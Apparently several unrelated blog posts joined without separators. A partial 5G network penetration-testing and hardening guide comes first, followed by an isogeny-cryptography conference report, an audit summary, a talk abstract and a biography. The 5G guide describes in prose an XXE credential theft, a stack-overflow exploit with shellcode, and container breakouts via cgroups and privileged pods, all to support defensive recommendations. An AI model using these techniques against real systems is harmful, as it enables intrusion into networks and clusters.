typical 5G deployment. A full more compromise hiearchy of threats are detailed within the Mitre FiGHT attack framework.
“Threats against a typical 5G network”
Reducing the vulnerabilities will decrease the risks and threats an operator will face. However, there is a fine line between testing time and finding vulnerabilities, and we can never guarantee we have found all the issues with a component. When scoping pentesting assessments, we always start with the edge and work our way into the centre of the network, trying to peel away the layers of functionality to expose potential security gaps. The same testing methodology applies to any network, but detailed below are some of the key points that we cover when brought into consult on 5G network builds.
Segment, restrict and deny all
Simple idea – if an attacker cannot see the service or endpoint then they cannot leverage access to it. A segmented network can improve network performance by containing specific traffic only to the parts of the network that need to see it. It can help to reduce attack surface by limiting lateral movement and preventing an attack from spreading. For example, segmentation ensures malware in one section does not affect systems in another. Segmentation reduces the number of in-scope systems, thereby limiting costs associated with regulatory compliance. However, we still see poor segmentation during engagements, where it was possible to directly connect to management components from the corporate operator network. Implementing VLANs to segment a 5G network is down to the security team and network architects. When considering a network architecture, segmenting the management network from signalling and user data traffic is key. Limiting access to the 5G core, NFVI services and exposed management to a small set of IP ranges using robust firewall rules with an implicit “deny all” statement is required. The Operations Support System (OSS) and Business Support Systems (BSS) are instrumental in managing the network but if not properly segmented from the corporate network can allow an unauthenticated attacker to leverage access to the entire 5G core network. Implementing robust role based access controls and multi-factor access controls to these applications is key, with suitably hardened Privileged Access Workstations (PAW) in place, with access closely monitored. Do not implement a secure 5G core but then allow all 3rd party vendors access to the entire network. Limit access using the principle of least privilege – should vendor A have access by default to vendor B’s management system? The answer is a clear no.
Limit access to the underlying network switches and routers – be sure to review the configuration of the devices and review the firmware versions. During recent 5G pentesting we have discovered poor default passwords for privileged accounts still in use, allowing access to network components, plus even end of support switch and router firmware. If an attacker was able to leverage access to the underlying network components any virtualised cloud network could be simply removed from the rest of the enterprise network. Within the new 5G network, software-defined networking (SDN) is used to provide greater network automation and programmability through the use of a centralised controller. However, the SDN controller provides a single point of failure and must have robust security policies in place to protect it. Check the configuration of the SDN controller software. Perhaps it is a java application with known vulnerabilities. Or is there an unauthenticated northbound REST API exposed to everyone in the enterprise network? Has the SDN controller OS not been hardened – perhaps no account lockout policy and default/weak SSH credentials used?
In short follow a zero trust principle when designing 5G network infrastructure.
Secure the exposed management edge
An attacker will likely enable access to the corporate network first before horizontally pivoting into the enterprise network via a jumpbox. So secure any services supplying access to the 5G core either at the NFVI application layer such as hardware running the cloud instance, the exposed OSS/BSS web applications or any interconnects (i.e. N1/N2 NAS) back to the core. Limit access to the exposed web applications with strong Role Based Access Controls (RBAC) and monitor access. Use a centralised access management platform (i.e. CyberARK) to control and police access to the OSS/BSS platforms. If you have to expose the cloud hardware processing layer to users (i.e. Dell iDRAC/HP iLO), don’t use default credentials or limit the recovery of remote password hashes. Exposing these underlying hardware control layers to multiple users due to poor segmentation could lead to an attacker conducting a DoS attack by simply turning off servers within the cluster and locking administrators out of the platforms used to manage services.
The myriad of exposed web APIs used for monitoring or control are also a vector for attack. During a recent engagement we discovered an XML External Entity Injection (XXE) vulnerability within an exposed management API and it was possible for an authenticated low privileged attacker to use a vulnerability in the configuration of the XML processor to read any file on the host system.
It was possible to send crafted payloads to the endpoint OSS application located at https://10.1.2.3/oss/conf/ and trigger this vulnerability, which would allow an attacker to:
Read the filesystem (including listing directories), which ended in getting a valid user to log into the server running the API alongside the credentials to successfully log into the SSH service of the mentioned machine.
Trigger Server Side Request forgery.
The resulting authenticated XXE request and response is illustrated below:
Using this XXE vulnerability, it was possible to read a properties file and recover LDAP credential information and then SSH directly into the host running the API server. In this particular case, once on the host running the containerised web application, the user could read all encrypted password hashes that were stored on the host, utilising the same decryption process and poorly stored key values that were used to encrypt the hashes. The same password was used for the root account and allowed for trivial privileged escalation to root. With the root access to the running API server, which in turn was a docker container running as a Kubernetes pod, it was possible to leverage a vulnerability with the Kubernetes configuration to compromise the container and escalate privileges to the underlying cluster worker node host. To prevent this type of escalation a defense in depth approach is paramount on any Linux host plus on any containers. More on this below.
Implement exploit mitigation measures on binaries
If you expose a service externally be sure to check it is compiled with exploit mitigation measures. Exploitation can be significantly simplified due to the manner in which any service/binary has been built. If a binary has an executable stack, and lacks any modern exploit mitigations such as ASLR, NX, stack cookies, hardened C functions, etc, then an attacker can utilise any issues they might find such as a stack buffer overflow, to get remote code execution (RCE) on the host. This was discovered whilst testing a 5G instance and an exposed sensitive encrypted and proprietary service. This service was exposed externally to the enterprise network, and after a brief analysis showed that it was likely a high risk process due to –
• It was exposed on all network interfaces, making it reachable across the network • It ran as the root user • It was built with an executable stack, and no exploit mitigations • It used unsafe functions such as memcpy, strcat, system, popen etc.
The service took a simple encrypted stream of data that was easily decrypt-able into a configuration message. Analysis of the message/data stream showed an issue with how the buffer data was stored and it was possible to trigger a memory corruption via a stack buffer overflow. After decompiling the binary using Ghidra, it was clear one important value was not used as an input to the function processing a certain string of data making up the configuration message – the size of the buffer used to store the parts of the string. Many of the instances where the function was used were safe due to the size and location of the target buffers. However, one of the elements of the message string was split into 12 parts, the first of which was stored in a short buffer (20 bytes in length) that was located at the end of the stack frame. Due to its length it was possible to overwrite data that was adjacent to the buffer, and due to the buffer’s location, this was the saved instruction pointer. When the function completed, the saved instruction pointer was used to determine where to continue execution. As the attacker could control this value they could take control over the process’s execution flow.
Knowing how to crash the stack it was possible using Metasploit to determine the offset of the instruction pointer and to determine how much data could be written to the stack. As the stack was executable it was straightforward to find a ROP gadget that would perform the command ‘JMP ESP’. An initial 100 byte payload was generated using Metasploit (pattern_create.rb). This was used to find the offset to over write the instruction pointer, using the Metasploit pattern_offset.rb script. The shellcode was generated by Metasploit and simply created a remote listener on port 5600. The shellcode was written to the stack after the bytes that control the instruction pointer.
To find and generate suitable exploit code took around 5-10 days work and would require an attacker with good reverse engineering skills. This service was running as root on the 5G virtualised network component, and due to the virtualised component accesses within the 5G network, could have been leveraged by attacker to compromise all other components. During this review the AFL fuzzer was used to determine any other locations within the input stream that could potentially cause a crash. A number of crashes were found revealing multiple issues with the binary.
“Running AFL fuzzer against the target binary”
To illustrate this issue further please read our blog posts Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks. In this particular opensource case, exposing “external” protocols and associated services like the UPF component on a remotely hosted server, not directly within in the 5G core could be leveraged by attacker to compromise a server (ie SMF) within the 5G core. It is important to bear this in mind when deploying equipment out to the end of the network. Physical access to the component, even when within a roadside cabinet or semi-secure location such as an exchange is possible, allowing an attacker to leverage access to the 5G core via a not so closely monitored signalling or data plane service. This is more prevalent now with the deployment of OpenRAN components, where multiple services (RU,DU,CU) are now potentially exposed.
Secure the virtualised cloud layer
All 5G core run on a virtualised cloud system being a custom built environment or from a separate provider such as VMWare. The main question is can an attacker break out of one container or pod to compromise other containers or potentially other clusters? It might even be possible for an attack to exploit the underlying hypervisor infrastructure if suitably positioned. There are multiple capabilities assigned to a running pod/container – privileged containers, hostpid, sysadmin, docker.sock, hostpath, hostnetwork – that could be overly permissive so allowing an attacker to leverage a feature to mount the underlying host cluster file system or to take full control over the Kubernetes host. We have also seen issues with kernel patching with a kernel privileged escalation vulnerability leveraged to breakout of a container.
During recent testing, applying security controls on the deployment of pods in the cluster were not managed by an admission controller. This meant that privileged containers, containers with the node file system mounted, containers running as root users, and containers with host facilities, could be deployed. This would enable any cluster user or principal with pod deployment privileges to compromise the cluster, the workloads, the nodes, and potentially gain access to the wider 5G environment.
The risk to an operator is that any developer with deployment privileges, even to a single namespace, can compromise the underlying node and then access all containers running on that node – which may be from other namespaces they do not have direct privileges for, breaking the separation of role model in use.
Leveraging a vulnerability such as the previous XXE issue or brute forcing SSH login credentials to a Docker container running with overly permissive capabilities has been leveraged on various engagements and is illustrated below.
“Container breakout via initial XXE vulnerability”
As mentioned it was possible to recover ssh credentials with a XXE vulnerability. Utilising the SSH access an escalating to root permissions on the container, it was possible to abuse a known issue with cgroups to perform privilege escalation and compromise the nodes and cluster from an unprivileged container. The Linux kernel does not check that the process setting the cgroups release_agent file has correct administrative privileges – the CAP_SYS_ADMIN capability in the root namespace , and so an unprivileged container that can create a new namespace with a fake CAP_SYS_ADMIN capability through unshare, could force the kernel to execute arbitrary commands when a process completed.
It was possible to enter a namespace with CAP_SYS_ADMIN privileges, and use the notify_on_release feature of cgroups, that did not differentiate between root namespace CAP_SYS_ADMIN and user namespace CAP_SYS_ADMIN, to execute a shell script with root privileges on the underlying host. A syscall breakout was used to execute a reverse shell payload with cluster admin privileges on the underlying cluster host. This is shown below:
“Container breakout utilising cgroups”
Once a shell was created on the underlying kubernetes cluster host, it was then possible to SSH directly to the RAN cluster due to credentials seen in backup files and exploit any basestation equipment. It was also possible to leverage weak security controls on the deployment of pods in the cluster since there was no admission controller. As this exploited cluster user had pod deployment privileges, it was possible to deploy a manifest specifying a master node for the pod to be deployed to, the access gained was root privileges on a master node. This highly privileged access enabled compromise of the whole cluster through gaining cluster administer privileges from a kubeconfig file located on the node filesystem.
As a proof of concept attack, the following deployment specification can be used to target the master node by chroot’ing to the underlying host :
“Deploying a bad pod to gain access to master node”
With the kubeconfig file from the master node it is then possible to read all namespaces on the cluster. It would also be possible from the master node to access the underlying hypervisor or virtualisation platform. We have also had in some cases due to discovered credentials, the ability to log directly into the VSphere client and disable hosts.
Strict enforcement of privilege limitations is essential to ensuring that users, containers, and services cannot bridge the containerisation layers of container, namespace, cluster, node, and hosting service. It should be noted that if only a small number of principals have access to a cluster, and they all require cluster administration privileges then, a cluster admin could likely modify any admission controller policies. However, best practice is to implement business policies and enforce the blocking of containers with weak security controls. Equally, if more roles are included with the administration model at a later date, then the likelihood of value in implementing admission controllers increases. In short the main recommendation is to ensure appropriate privilege security controls are enforced to prevent deployments having access or the ability to compromise other layers of the orchestration model. Consider implementing limitations to which worker nodes containers can deploy, and insecure manifest configurations can be deployed.
Scan, verify, monitor and patch all images regularly
It is important when deploying virtualised container images to check regularly for any changes to the underlying OS, audit any events such as login events plus patch all critical vulnerabilities as soon as possible. Basic vulnerability management is key – identifying and prevent risks to all the hosts, images and functions. Scanning images before they are deployed should be done by default on a regular interval.
For instance, if a Kubernetes cluster is utilising a Harbor registry, simply enabling vulnerability scanning “Automatically scan images on push” with a suitable tool such as Trivy with a regularly updated set of vulnerabilities will suffice. Even preventing vulnerable images from running is possible for images with a certain severity. Implement signed images or content trust also gives you the ability to verify both the integrity and the publisher of all the data received from a registry over any channel.
“Setting harbor to automatically scan images”
Enforce with tighter contracts with vendors the need to supply patches to images quicker and verify as much as possible all patches have had no change to the underlying functionality. Enforcing the use of harden Linux OS images is best practice, utilising CIS benchmarks scans to verify OS images have been hardened. This is also important on the underlying cluster hosts. Our recommendation is to move security back to the developer or vendor with a secure Continuous Integration and Continuous Development (CI/CD) pipeline with Open Policy Agent integrations to secure workloads across the Software Development Life Cycle (SDLC). NCC Group conducts regular reviews of CI/CD pipelines and can help you understand the issues. Please check out 10 real world stories of how we’ve compromised ci/cd pipelines for further details.
If possible get a software build of materials (SBOM) from vendors. SBOM is an industry best practice part of secure software development that enhances the understanding of the upstream software supply chain, so that vulnerability notifications and updates can be properly and safely handled across the installed customer base. The SBOM documents proprietary and third-party software, including commercial and free and open source software (FOSS), used in software products. The SBOM should be maintained and used by the software supplier and stored and viewed by the network operator. Operators should be periodically checking against known vulnerability databases to identify potential risk. However, the level of risk for a vulnerability should be determined by the software vendor and operator with consideration of the software product, use case, and network environment.
Once an image is running, verifying the running services is key with some kind of runtime defences. This will entail implementing strong auditing utilising auditd and syslog to monitor kernel, process and access logs. We have seen no use of this service plus no use of any antivirus. Securing containers with Seccomp and either AppArmor or SELinux would be enough to prevent container escape. Taking all the logging data into a suitable active defence engine could allow for more predictive and threat-based active protection for running containers. Predictive protection could include capabilities like determining when a container runs a process not included in the origin image or creates an unexpected network socket. Threat-based protection includes capabilities like detecting when malware is added to a container or when a container connects to a botnet. Utilising a machine learning model to create a model for each running container in the cluster is highly recommended. Applied intelligence used for monitoring log data is key for any threat prevention, aiding in the SOC identifying quickly key 5G attack vectors.
Implement 5G security functions
Previous generations of cellular networks failed on providing confidentiality/integrity protection on some pre-authentication signalling messages, allowing attackers to exploit multiple vulnerabilities such as IMSI sniffing or downgrade attacks to 5G. The 5G standard facilitates a base level of security with various security features. However, we have seen during engagements these are not enabled.
The 5G network uses data encryption and integrity protection mechanisms to safeguard data transmitted by the enterprise, prevent information leakage and enhance data security for the enterprise. Not implementing these will compromise the confidentiality, integrity and availability (CIA).
5G introduces novel protection mechanisms specifically designed for signalling and user data. 5G security controls outlined in 3GPP Release 15 include:
• Subscriber permanent identifier (SUPI) – a unique identifier for the subscriber • Dual authentication and key agreement (AKA) • Anchor key is used to identify and authenticate UE. The key is used to create secure access throughout the 5G infrastructure • X509 certificates and PKI are used to protect various non-UE devices • Encryption keys are used to demonstrate the integrity of signalling data • Authentication when moving from 3GPP to non-3GPP networks • Security anchor function (SEAF) allows reauthentication of the UE when it moves between different network access points • The home network carries out the original authentication based on the home profile (home control) • Encryption keys will be based on IP network protocols and IPSec • Security edge protection proxy (SEPP) protects the home network edge • 5G separates control and data plane traffic
Besides increasing the length of the key algorithms (to 256-bit expected for future 3GPP releases), 5G forces mandatory integrity support of the user plane, and extends confidentiality and integrity protection to the initial NAS messages. The table below summarises in various columns the standard requirements in terms of confidentiality and integrity protection as defined in the 3GPP specs. 5G also secures the UE network capabilities, a field within the initial NAS message, which is used to allow UEs to report to the AMF about the supported integrity and encryption algorithms in the initial NAS message.
In general there has been an increase in the number of security features in 5G to address issues found with the legacy 2G, 3G and 4G network deployments and various published exploits. These have been included within the different 3GPP specifications and adopted by the various vendors. It should be noted that a lot of the security features are optional and the implementation of these is down to the operator rather than the vendor.
The only security features that are defined as mandatory within the 5G standards are integrity checking of the RRC/NAS signalling plane and on the IPX interface the mandatory use of a Security Edge Protection Proxy (SEPP). The SUPI encryption is optional but in the UK this is required due to GDPR.
“Table illustrating various 4G / 5G security functions”
As shown, the user plane integrity protection is still optional so still in theory vulnerable to attack such as malicious redirect of traffic using a DNS response. Some providers now by default turn on the new integrity protection feature for the user plane and prevent an attacker forcing the network to use a less secure algorithm. In 4G, a series of GRX firewalls are in place to limit attacks via the IPX network but due to the use of HTTPS in 5G control messages a new SEPP device is mandated to allow matching of control and user plane sessions.
By collecting 5G signalling traffic it is possible to check implementations and analyse the vulnerabilities. NCC Group conducts these assessments and advises clients on implementing various optional security features either related to 5G or with other legacy systems such as enabling A5/4 algorithm on GSM networks. This issue is illustrated clearly within the paper European 5G Security in the Wild: Reality versus Expectations. This paper highlights the issues with no concealment of permanent identifiers and the fact it was possible to capture the permanent IMSI and IMEI values, which are sent without protection within the NAS Identity Response message. Issues with the temporary identifier and GUTI refresh have also been observed. After receiving the NAS Attach Accept and RRC Connection Request messages, the freshness of m-TMSI value was not changed, only changing during a Registration procedure. This would allow TMSI tracking and possible geolocation of 5G user handsets.
As 5G networks become more mature and deployments progress to full 5G SA deployments, it is likely issues affecting the network will be addressed. However, it is important to implement and test these new security features as soon as possible to prevent a compromise.
Summary
The 5G network is a complex environment, requiring methodical comprehensive reviews to secure the entire stack. Often a company may lack the time, specialist security knowledge, and people needed to secure their network. Fundamentally, a 5G network must be configured properly, robustly tested and security features enabled.
As seen from above, most compromises have the following root causes or can be traced back to:
• Lack of segmentation and segregation • Default configurations • Over permissive permissions and roles • Poor patching • Lack of security controls
I recently returned from Eindhoven, where I had the pleasure of giving a talk on some recent progress in isogeny-based cryptography at the SIAM Conference on Applied Algebraic Geometry (SIAM AG23). Firstly, I want to thank Tanja Lange, Krijn Reijnders and Monika Trimoska, who orgainsed the mini-symposium on the application of isogenies in cryptography, as well as the other speakers and attendees who made the week such a vibrant space for learning and collaborating.
As an overview, the SIAM Conference on Applied Algebraic Geometry is a biennial event which aims to collect together researchers from academia and industry to discuss new progress in their respective fields, which all fall under the beautiful world of algebraic geometry. Considering the breadth of algebraic geometry, it is maybe not so surprising that the conference is then filled with an eclectic mix of work, with mini-symposia dedicated to biology, coding theory, cryptography, data science, digital imaging, machine learning and robotics (and much more!).
In the world of cryptography, algebraic geometry appears most prominently in public-key cryptography, both constructively and in cryptanalysis. Currently in cryptography, the most widely applied and studied objects from algebraic geometry are elliptic curves. The simple, but generic group structure of an elliptic curve together with efficient arithmetic from particular curve models has made it the gold standard for Diffie-Hellman key exchanges and the protocols built on top of this. More recently, progress in the implementation of bilinear pairings on elliptic curves has given a new research direction for building protocols. For an overview of pairing-based cryptography, I have a blog post discussing how we estimate the security of these schemes, and my colleague Eric Schorn has a series of posts looking at the implementation of pairing-based cryptography in Haskell and Rust.
Despite the success of elliptic curve cryptography, Shor’s quantum polynomial time algorithm to solve the discrete logarithm problem in abelian groups means a working, “large-enough”, quantum computer threatens to break most of the protocols which underpin modern cryptography. This devastating attack has led to the search for efficient, quantum-safe cryptography to replace the algorithms currently in use. Mathematicians and cryptographers have been searching for new cryptographically hard problems and building protocols from these, and algebraic geometry has again been a gold mine for new ideas. Our group effort since Shor’s paper in 1995 has lead to exciting progress in areas such as multivariate, code-based, and my personal favourite, isogeny-based cryptography.
The study of post-quantum cryptography was the focus of many of the cryptographic talks over the course of the week, although the context and presentation of these problems was still very diverse. Zooming out, SIAM collectively organised 128+ sessions and 10 plenary talks; a full list of the program is available online. With a diverse group of people and a wide range of topics, the idea was not to attend everything (this is physically impossible for those who cannot split themselves into ~fourteen sentient pieces), but rather pick our own adventure from the program.
For the cryptographers who visited Eindhoven, there were three main symposia, which ran through the week without collisions:
Applications of Algebraic Geometry to Post-Quantum Cryptology.
Elliptic Curves and Pairings in Cryptography.
Applications of Isogenies in Cryptography.
Additional cryptography talks were in the single session “Advances in Code-Based Signatures”, which ran concurrently with the pairing talks on the Wednesday.
For those interested in a short summary of many of the talks at SIAM, Luca De Feo wrote a blog post about his experience of the conference which is available on Elliptic News. As a compliment to what has then already been written, the aim of this blogpost is to give a general impression of what people are thinking about and the research which is currently ongoing.
In particular, the goal of this post is to summarize and give context to two of the main research focuses in isogeny-based cryptography which were talked about during the week. On one side, there is a deluge in new protocols being put forward which study isogenies between abelian varieties, generalising away from dimension one isogenies between elliptic curves. On the other side, the isogeny-based digital signature algorithm, SQIsign, has recently been submitted to the recent call for new quantum safe signatures by NIST. Many talks through the week focused on algorithmic and parameter improvements to aid in the submission process.
What is an isogeny?
For those less familiar with isogenies, a very rough way to start thinking about isogeny-based cryptography can be understood as long as you have a good idea of how it feels to get lost, even when you know where you’re supposed to be going. Essentially, you can take a twisting and turning walk by using an “isogeny” to step from one elliptic curve to another. If I tell you where I started and where I end up, it seems very difficult for someone else to determine exactly the path I took to get there. In this way, our cryptographic secret is our path and our public information is the final curve at the end of this long walk.
Not only does this problem seem difficult, it also seems equally difficult for both classical and quantum computers, which makes it an ideal candidate for the building block of new protocols which aim to be quantum-safe. For some more context on the search for protocols in a “post-quantum” world, Thomas Pornin wrote an overview at the closing of round three of the NIST post-quantum project which ended about a year ago at the time of writing.
A little more specifically, for those interested, an isogeny is a special map which respects both the geometric idea of elliptic curves (it maps some projective curve to another), but also the algebraic group structure which cryptographers hold so dear (mapping the sum of points is the same as the sum of the individually mapped points). Concretely, an isogeny is some (non-constant) rational map which maps the identity on one curve to the identity of another.
Isogenies in Higher Dimensions
For the past year, isogeny-based cryptography has undergone a revolution after a series of papers appeared which broke the key exchange protocol SIDH. The practical breakage of SIDH was particularly spectacular as it essentially removed the key-exchange mechanism, SIKE, from the NIST post-quantum project; which only weeks before had been chosen by NIST to continue to the fourth round as a prospective alternative candidate to Kyber.
For more information on the break of SIDH, I have a post on the SageMath implementation of the first attack, as well as a summary of the Eurocrypt 2023 conference, where the three attack papers were presented in the best-paper award plenary talks. Thomas Decru, one of the authors of the first attack paper, wrote a fantastic blog post which is a great overview of how the attack works.
The key to all of the attacks was that given some special data, information about the secret walk between elliptic curves could be recovered by computing an isogeny in “higher dimension”. In fact, the short description about isogenies was a little to restrictive. For the past ten years, cryptographers have been looking at how to compute isogenies between supersingular elliptic curves. However, over the fence in maths world, a generalisation of this idea is to look at isogenies between principally polarised superspecial abelian varieties. When we talk about these superspecial abelian varieties, a natural way to categorise them is by their “genus”, or “dimension”.
Luckily, for now, we don’t need to worry about arbitrary dimension, as for the current work we really only need dimension two for the attack on SIDH, and for some new proposed schemes, dimensions four and eight, which I won’t discuss much further.
If you want to imagine these higher dimensional varieties, one way is to think about three dimensional surfaces which have some “holes” or “handles”. A dimension one variety is an elliptic curve, which you can imagine as a donut. In dimension two we have two options, the generic object is some surface with two handles (a donut with two holes? Where’s all my donut gone?), but there are also “products of elliptic curves”, which can be seen as two dimensional surfaces which can in some sense be factored into two dimension-one surfaces (or abstractly, as a pair of donuts!).
The core computation of the attack is a two-dimensional iosgeny between elliptic products. An isogeny between elliptic products is simply a walk which takes you from one of these pairs of donuts, through many many steps of the generic surface and ends on another special surface which factors into donuts again. A natural question to ask is, how special are these products? When we work in a finite field with characteristic p, we have about p^3 surfaces available and only p^2 of these are elliptic products. In cryptographic contexts, where the characteristic is usually very very large, it’s essentially impossible to accidentally land on one of these products.
With this as background, we can now ask a few natural questions:
When can we compute isogenies between elliptic products?
Why do we want to compute isogenies between elliptic products?
How can we ask computers to compute isogenies between elliptic products?
Understanding when we find these very special isogenies between elliptic products was categorised by Ernst Kani in 1997, and it was this lemma which illuminated the method to attack SIDH. Kani’s criterion described how when a set of one dimensional isogenies has particular properties, and when you additionally know certain information about the points on these curves, you would find that your specially chosen two dimensional isogeny would walk between elliptic products.
This is what Thomas Decru talked about in his presentation, which gave a wonderful overview of why these criteria were enough to successfully break SIDH. The idea is that although some of this information is secret, you can guess small parts of the secret and when you are correct, your two dimensional isogeny splits at the end. Guessing each part of the secret in turn then very quickly recovers the entire secret.
Following the description of the death of SIKE, Tako Boris Fouotsa talked about possible ways to modify the SIDH protocol to revive it. The general idea is to hide parts of the information Kani’s criterion required to in such a way that an attacker can no longer guess it piece by piece. One method is to take the information you need from the points on curves and mask it by multiplying them by some secret scalar.
Masking these points, which are the torsion data for the curves, was also the topic of two other talks. Guido Lido gave an energetic and enjoyable double-talk on the “level structure” of elliptic curves, which was complimented very nicely by a talk by Luca De Feo the following day which gave another perspective on how modular curves can help us complete the zoology of these torsion structures. Along with this categorisation, Luca gave a preview of a novel attack on one possible variant of SIDH which hides half of the torsion data. If the SIDH is to be dragged back into protocols with the strategies discussed by Boris, it’s vital to really understand mathematically what this masking is, highlighting the importance of the work by Guido, Luca and their collaborators.
Although breaking a well-known and long standing cryptographic protocol is more than enough motivation to study these isogenies, the continued research on computing higher dimensional isogenies will be motivated by the introduction of these maps into protocols themselves. This brings us to the why, and this was addressed by Benjamin Wesolowski, who discussed SQIsignHD and Luciano Maino, who discussed FESTA. As SQIsign and related talks will soon have a section of its own, we’ll jump straight to FESTA.
The essence of FESTA is to find a way to configure some one dimensional isogenies during keygen and encryption such that during decryption, a holder of the secret key can perform the SIDH attack, while no one else can. As the SIDH attack describes secrets about the one dimensional isogenies, encryption is then a case of using some message to describe the isogeny path and as decryption recovers this path it also recovers the secret message. The core of how FESTA works is tied up in categories of masking, as Guido and Luca described. Luciano used his presentation to give an overview of how everything comes together, and how by using commutative masking matrices, encryption masks away certain critical data, and then during decryption the masking can be removed due thanks to the commutativity.
The idea of using SIDH attacks to build a quantum-safe public key encryption protocol is not new. In SETA, a very similar protocol was described. However, due to the inefficiencies of the SIDH attacks at the time, the protocol itself did not have practical running times. The key to what makes FESTA efficient is precisely the new polynomial time algorithms for the attack.
To close out the third session of the isogeny session, I then did my best to try and talk about the how. Given the motivation that these isogenies can be used constructively to build quantum-safe protocols, can we find ways to strip back the complications in existing implementations and get something efficient and simple enough so it appears suitable for cryptographic protocols. The talk was split between the three categories of isogenies we need:
The first step is understanding how to compute the “gluing isogeny”, between a product of elliptic curves and the resulting dimension-two surface.
The last step is understanding how to efficiently compute the “splitting isogeny” from a two-dimensional surface to a pair of elliptic curves.
All other steps are then isogenies between these generic two dimensional surfaces. These are described by the Richelot correspondence, which date back to the 19th century and are surprisingly simple considering the work they do.
I described some new results which allow for particularly efficient gluing isogenies, and that working algebraically, a closed form of the splitting isogeny can be recovered, saving about 90% of the work of the usual methods. For the middle steps, there’s still much work to be done and I hope as a community we can continue optimising these isogenies.
In summary, the SIDH attacks have introduced a whole new toolbox of isogenies and it’s exciting to see these being used constructively and optimised for real-world usage. The cryptanalysis on isogenies based protocols of course has it’s own revolution and understanding how higher dimensional structures can make or break new schemes is vibrant and exciting work.
An Isogeny Walk back to NIST
Back in dimension one, an isogeny-based digital signature algorithm has been submitted to NIST’s recent call for protocols. Of the 40 candidates which appeared with round one coming online, only one is isogeny-based. SQIsign is an extremely compact, but relatively new and slow protocol which was introduced in 2020 and was followed up with a paper with various performance enhancements in 2022.
Underlying SQIsign is a fairly simple idea. The signer has computes a secret isogeny path between two elliptic curves. The starting curve, which is public and known to everyone, has special properties. The signer publishes their ending curve as a public key, but as only they know the isogeny between the curve, only the signer knows special properties of the ending curve. A signature is computed from a high-soundness sigma protocol, which essentially boils down to asking the signer to compute something which they could only know if they know this secret isogeny.
Concretely, SQIsign is built on the knowledge of the endomorphism ring of an elliptic curve, which is the set of isogenies from a curve to itself. The starting curve is chosen so everyone knows its endomorphism ring. The trick in SQIsign is that although generally it seems hard to compute the endomorphism ring of a random supersingular curve, if you know an isogeny between two curves and the endomorphism ring of one of them, you can efficiently compute the endomorphism ring of the other. This means that the secret isogeny allows the signer to “transport” the endomorphism ring from the starting curve to their public curve thanks to their secret isogeny and so the endomorphism ring of this end curve is secret to everyone except the signer.
Algorithms become efficient thanks to the Deuring correspondence, which takes information from an elliptic curve and represents it using a quaternion algebra. In quaternion world, certain problems become easy which are hard on elliptic curves, and once the right information is recovered, the Deuring correspondence maps this all back to elliptic curve world so the protocol can continue. Ultimately all of the above boils down to “things are computationally easy if you know the endomorphism ring”. Because of this, as signer can compute things from the public curve which nobody else can feasibly do.
There’s a lot of buzzwords in the above, and unpicking exactly how SQIsign works is challenging. For the interested reader, I recommend the above papers, along with Antonin Leroux’s thesis. For those who like to learn along with the implementation, I worked with some collaborators to write a verbose implementation following the first SQIsign paper in SageMath. A blog discussing implementation challenges was written: Learning to SQI and the code is on GitHub.
The selling point of SQIsign is its compact representation. For NIST level I security (128-bit), a public key requires only 64 bytes and a signature only 177 bytes. Compare this to Dilithium, a lattice based scheme chosen at the end of round three, which at the same security level has public keys with 1312 bytes and signatures of 2420 bytes! However, the main drawback is that it’s magnitudes slower than Dilithium, and the complex, heuristic algorithms of some of the quaternion algebra pieces means that writing a safe and side-channel resistant implementation is extremely challenging.
At SIAM, progress in closing the efficiency gap was the subject of several talks, and optimisations are being found in a variety of ways. Lorenz Panny discussed the Deuring correspondence in a more general setting, where he showed that with some clever algorithmic tricks, isogenies could be computed in reasonable time by using extension fields to gather enough data for the Deuring correspondence to be feasible, even for inefficient parameter sets.
On the flip side of this, Michael Meyer discussed recent advances in parameter searching for SQIsign, which makes the work that Lorenz described particularly efficient. One of the main bottlenecks in SQIsign is in computing large prime degree isogenies, which occurs because SQIsign requires the characteristic p to both have p+1 and p-1 to have many small factors and for large p, it’s tough to ensure all these factors stay as small as possible. Michael discussed several different tricks which can be used to find twin smooth numbers and how different techniques are beneficial depending on the size of bit-length of p. The upshot is the culmination of all the ideas has allowed the SQIsign team to find valid parameter sets targeting all three NIST security levels.
Antonin Leroux talked more specifically about the Deuring correspondence as used in the context of SQIsign and focused on the improvements between the 2020 and 2022 SQIsign papers. The takeaway was that several improvements have resulted in performance enhancements to allow up to NIST-V parameter sets, but the protocol was a long way off competing with the lattice protocols which had already been picked. Optimistically, we can always work hard to find faster ways to do mathematics, and the compact keys and signatures of SQIsign make it extremely attractive for certain use cases.
To finish the summary, we can come back to Benjamin Wesolowski’s talk, which described recent research which adopts the progress in higher dimensions and modifies the SQIsign protocol, removing many heuristic and complicated steps during keygen and signing and shifts the protocol’s complexity into verification.
The main selling point of SQIsignHD is that it is not only simpler to implement in many ways, but the security proofs become much more straight forward, which should go a long way to show that the protocol is robust. However, unlike the original SQIsign, SQIsignHD verification requires the computation of a four dimensional isogeny. These isogenies are theoretically described, but a full implementation of these is still a work in progress. Understanding precisely how the verification time is affected is key to understanding whether the HD-remake of SQIsign could either replace of exist along side of the original description.
Acknowledgements
Many thanks to Aleksander Kircanski for reading an earlier draft of this blog post, and to all the people I worked with during the week in Eindhoven.
During the summer of 2023, Entropy Cryptography Inc engaged NCC Group’s Cryptography Services team to perform a cryptography and implementation review of several Rust-based libraries implementing constant-time big integer arithmetic, prime generation, and secp256k1 (k256) elliptic curve functionality. Two consultants performed the review within 40 person-days of effort, which included retesting and report generation.
The three primary code repositories in scope for this review were:
The review identified a range of issues that were addressed promptly once reported, with the proposed fixes aligning with the recommendations made in the report below.
Aaron Adams presented this talk at HITB Phuket on the 24th August 2023. The talk
detailed how NCC Exploit Development Group (EDG) in Pwn2Own 2022 Toronto was
able to exploit two different PostScript vulnerabilities in Lexmark printers.
The presentation is a good primer for those interested in further researching
the Lexmark PostScript stack, and also those interested in how PostScript
interpreter exploitation can be approached in general.
Mathew Vermeer is a doctoral candidate at the Organisation Governance department of the faculty of Technology, Policy and Management of Delft University of Technology. At the same university, he has received both a BSc degree in Computer Science and Engineering, as well as a MSc degree in Computer Science with a specialization in cyber security. His master’s thesis examined (machine learning-based) network intrusion detection systems (NIDSs), their effectiveness in practice, and methods for their proper evaluation in real-world settings.In 2019 he joined the university as a PhD researcher. Mathew’s current research similarly includes NIDS performance and management processes within organizations, as well as external network asset discovery and security incident prediction.
Introduction
